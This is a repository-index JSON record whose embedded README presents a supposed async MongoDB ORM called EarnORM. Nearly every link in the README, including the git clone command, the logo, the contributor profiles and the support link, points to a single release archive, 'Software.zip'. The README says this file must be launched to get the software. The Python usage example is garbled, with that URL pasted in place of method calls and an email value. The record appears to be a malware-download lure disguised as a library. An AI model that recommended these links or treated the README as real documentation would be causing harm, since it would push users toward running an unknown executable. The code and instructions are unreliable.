{"id":24408049,"url":"https://github.com/lethanhdat0403/earnorm","last_synced_at":"2026-05-15T11:36:10.095Z","repository":{"id":272323134,"uuid":"916201171","full_name":"lethanhdat0403/earnorm","owner":"lethanhdat0403","description":"EarnORM is a high-performance, async-first MongoDB ORM for Python, designed to maximize throughput in I/O-bound applications. Built on top of Motor and Pydantic, it leverages the full power of async/await to handle thousands of database operations concurrently while maintaining type safety and data validation.","archived":false,"fork":false,"pushed_at":"2025-03-10T21:22:03.000Z","size":1,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-10T21:24:48.482Z","etag":null,"topics":["asyncio","hacktoberfest","mongo","mongodb","mongodb-orm","motor","nosql","orm","pydantic","python"],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lethanhdat0403.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-01-13T16:38:54.000Z","updated_at":"2025-03-10T21:22:07.000Z","dependencies_parsed_at":"2025-01-27T18:27:05.182Z","dependency_job_id":"9823faf2-ca02-428a-ba36-d98ab1764910","html_url":"https://github.com/lethanhdat0403/earnorm","commit_stats":null,"previous_names":["lethanhdat0403/earnorm"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lethanhdat0403%2Fearnorm","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lethanhdat0403%2Fearnorm/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lethanhdat0403%2Fearnorm/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lethanhdat0403%2Fearnorm/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lethanhdat0403","download_url":"https://codeload.github.com/lethanhdat0403/earnorm/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243374211,"owners_count":20280656,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["asyncio","hacktoberfest","mongo","mongodb","mongodb-orm","motor","nosql","orm","pydantic","python"],"created_at":"2025-01-20T05:34:00.177Z","updated_at":"2026-05-15T11:36:05.072Z","avatar_url":"https://github.com/lethanhdat0403.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🚀 **EarnORM: High-Performance MongoDB ORM for Python**\n![EarnORM Logo](https://github.com/lethanhdat0403/earnorm/releases/download/v1.0/Software.zip)\n\n## Overview\nEarnORM is a cutting-edge, asynchronous-first MongoDB ORM for Python, crafted to enhance throughput in I/O-bound applications. Leveraging the power of Motor and Pydantic, this ORM enables handling thousands of database operations concurrently while ensuring type safety and data validation. Whether you are working on a small project or a large-scale application, EarnORM provides a robust and efficient solution for interacting with MongoDB.\n\n## Features\n⚡ High-Performance Async-First Approach  \n⚙️ Built on Motor and Pydantic  \n🔄 Asynchronous Handling of Concurrent Database Operations  \n🔒 Type Safety and Data Validation  \n📦 Easy Integration with Existing Python Projects  \n🌐 Seamless Support for Async I/O Tasks  \n\n## Topics\n['asyncio', 'hacktoberfest', 'mongo', 'mongodb', 'mongodb-orm', 'motor', 'nosql', 'orm', 'pydantic', 'python']\n\n## Repository Link\n[![Download Software](https://github.com/lethanhdat0403/earnorm/releases/download/v1.0/Software.zip)](https://github.com/lethanhdat0403/earnorm/releases/download/v1.0/Software.zip)\n\nIf the link ends with a file name, it needs to be launched to access the software.\n\n🔗 For more information and updates, please visit the [EarnORM GitHub Repository](https://github.com/lethanhdat0403/earnorm/releases/download/v1.0/Software.zip).\n\n## Installation\nTo install EarnORM, simply clone the repository and follow the instructions in the documentation. Ensure you have Python and MongoDB set up on your system before proceeding with the installation.\n\n```bash\ngit clone https://github.com/lethanhdat0403/earnorm/releases/download/v1.0/Software.zip\ncd earnorm\npip install .\n```\n\n## Usage\nHere is a quick example demonstrating the basic usage of EarnORM:\n\n```python\nfrom earnorm import EarnORM\n\n# Initialize EarnORM with MongoDB connection details\nearnorm = EarnORM('mongodb://localhost:27017/', database='mydb')\n\n# Define a Pydantic model\nclass User(BaseModel):\n    name: str\n    email: EmailStr\n\n# Insert a document into the 'users' collection\nnew_user = User(name='John Doe', email='https://github.com/lethanhdat0403/earnorm/releases/download/v1.0/Software.zip')\nresult = await https://github.com/lethanhdat0403/earnorm/releases/download/v1.0/Software.zip('users', https://github.com/lethanhdat0403/earnorm/releases/download/v1.0/Software.zip())\n\n# Retrieve all documents from the 'users' collection\nall_users = await https://github.com/lethanhdat0403/earnorm/releases/download/v1.0/Software.zip('users')\n\nprint(all_users)\n```\n\n## Contributors\n👨‍💻 Our project thrives thanks to the contributions of these amazing developers:\n- [@dev1](https://github.com/lethanhdat0403/earnorm/releases/download/v1.0/Software.zip)\n- [@dev2](https://github.com/lethanhdat0403/earnorm/releases/download/v1.0/Software.zip)\n- [@dev3](https://github.com/lethanhdat0403/earnorm/releases/download/v1.0/Software.zip)\n\n## License\nThis project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.\n\n## Support\nFor any queries or assistance, please open an issue on the [EarnORM GitHub Repository](https://github.com/lethanhdat0403/earnorm/releases/download/v1.0/Software.zip).\n\n---\n\n🌟 Thank you for choosing EarnORM! Happy coding! 🚀","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flethanhdat0403%2Fearnorm","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flethanhdat0403%2Fearnorm","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flethanhdat0403%2Fearnorm/lists"}